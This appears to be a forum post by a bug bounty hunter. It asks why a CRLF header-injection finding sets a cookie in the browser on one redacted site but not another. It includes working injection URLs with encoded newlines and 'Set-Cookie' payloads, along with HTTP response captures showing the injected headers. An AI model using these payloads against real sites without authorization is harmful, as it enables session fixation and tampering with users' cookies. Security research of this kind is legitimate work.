Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:
https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav
I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :
http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav
http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav
But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser.
Working Curl request:
root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav
HTTP/2 301
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 185
location: https://www.redacted.com/lp/redirects/?olp=/lp/
set-cookie: dipesh=yadav
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800
HTTP/2 200
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 1452
vary: Accept-Encoding
last-modified: Tue, 04 Feb 2020 15:54:26 GMT
etag: "redacted"
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800
access-control-allow-origin: *
accept-ranges: bytes
NOT WORKING REQUEST:
root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 13 Aug 2020 15:05:04 GMT
Content-Type: text/html
Content-Length: 162
Location: https://www.redacted.de/sso/registration/account/
Set-Cookie: bugbounty=bugbountyplz
Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT
Cache-Control: private
Age: 0
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Connection: keep-alive
HTTP/2 200
server: nginx
date: Thu, 13 Aug 2020 15:05:05 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
access-control-allow-credentials: true
access-control-allow-origin: https://www.redacted.de
last-modified: Thu, 13 Aug 2020 15:05:05 GMT
cache-control: no-cache, private
age: 0
strict-transport-security: max-age=15768000
x-frame-options: DENY
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.
Go to Source
Author: Dipesh Sunrait